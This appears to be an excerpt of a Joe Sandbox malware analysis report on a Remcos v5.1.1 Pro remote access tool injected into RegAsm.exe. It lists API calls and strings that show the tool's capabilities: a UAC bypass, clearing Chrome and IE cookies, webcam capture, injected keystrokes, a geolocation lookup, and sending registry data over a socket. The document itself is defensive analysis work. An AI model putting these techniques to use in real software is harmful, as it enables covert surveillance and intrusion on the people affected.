                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 3864826663-0
                                                                APIs
                                                                • SendInput.USER32 ref: 00419A25
                                                                • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: InputSend$Virtual
                                                                • String ID:
                                                                • API String ID: 1167301434-0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: __freea$__alloca_probe_16_free
                                                                • String ID: a/p$am/pm$h{D
                                                                • API String ID: 2936374016-2303565833
                                                                APIs
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • _free.LIBCMT ref: 00444E87
                                                                • _free.LIBCMT ref: 00444E9E
                                                                • _free.LIBCMT ref: 00444EBD
                                                                • _free.LIBCMT ref: 00444ED8
                                                                • _free.LIBCMT ref: 00444EEF
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$AllocateHeap
                                                                • String ID: KED
                                                                • API String ID: 3033488037-2133951994
                                                                APIs
                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Enum$InfoQueryValue
                                                                • String ID: [regsplt]$xUG$TG
                                                                • API String ID: 3554306468-1165877943
                                                                APIs
                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                • __fassign.LIBCMT ref: 0044B4F9
                                                                • __fassign.LIBCMT ref: 0044B514
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                                • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                • String ID:
                                                                • API String ID: 1324828854-0
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                                  • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                  • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                • String ID: xUG$NG$NG$TG
                                                                • API String ID: 3114080316-2811732169
                                                                APIs
                                                                  • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                                  • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                  • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                • _wcslen.LIBCMT ref: 0041B7F4
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                • API String ID: 37874593-122982132
                                                                APIs
                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                • API String ID: 1133728706-4073444585
                                                                APIs
                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                Strings
                                                                • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                • String ID: http://geoplugin.net/json.gp
                                                                • API String ID: 3121278467-91888290
                                                                APIs
                                                                  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                • _free.LIBCMT ref: 00450FC8
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00450FD3
                                                                • _free.LIBCMT ref: 00450FDE
                                                                • _free.LIBCMT ref: 00451032
                                                                • _free.LIBCMT ref: 0045103D
                                                                • _free.LIBCMT ref: 00451048
                                                                • _free.LIBCMT ref: 00451053
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                • int.LIBCPMT ref: 004111BE
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                • String ID: (mG
                                                                • API String ID: 2536120697-4059303827
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                APIs
                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040760B
                                                                  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                • CoUninitialize.OLE32 ref: 00407664
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                • API String ID: 3851391207-1839356972
                                                                • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                APIs
                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                • GetLastError.KERNEL32 ref: 0040BB22
                                                                Strings
                                                                • UserProfile, xrefs: 0040BAE8
                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteErrorFileLast
                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                • API String ID: 2018770650-304995407
                                                                • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                APIs
                                                                • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Console$AllocOutputShowWindow
                                                                • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                                • API String ID: 2425139147-3820604032
                                                                • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                APIs
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                • String ID: Alarm triggered$`Mw
                                                                • API String ID: 614609389-968373943
                                                                • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                APIs
                                                                • __allrem.LIBCMT ref: 0043ACE9
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                • __allrem.LIBCMT ref: 0043AD1C
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                • __allrem.LIBCMT ref: 0043AD51
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 1992179935-0
                                                                • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                APIs
                                                                • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: H_prologSleep
                                                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                • API String ID: 3469354165-3054508432
                                                                • Opcode ID: c9c8c556a156b08ca1f4ae787fccd75c1cb4fb9dff4f64211de25059e72c3e49
                                                                • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                • Opcode Fuzzy Hash: c9c8c556a156b08ca1f4ae787fccd75c1cb4fb9dff4f64211de25059e72c3e49
                                                                • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                APIs
                                                                  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                • String ID:
                                                                • API String ID: 3950776272-0
                                                                • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __cftoe
                                                                • String ID:
                                                                • API String ID: 4189289331-0
                                                                • Opcode ID: 94b9633d951d926261153e35bea3a027a650b668ee6fc08797af1e1f6808f75f
                                                                • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                • Opcode Fuzzy Hash: 94b9633d951d926261153e35bea3a027a650b668ee6fc08797af1e1f6808f75f
                                                                • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                • String ID:
                                                                • API String ID: 493672254-0
                                                                • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                APIs
                                                                • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                • _free.LIBCMT ref: 004482CC
                                                                • _free.LIBCMT ref: 004482F4
                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                • _abort.LIBCMT ref: 00448313
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free$_abort
                                                                • String ID:
                                                                • API String ID: 3160817290-0
                                                                • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                APIs
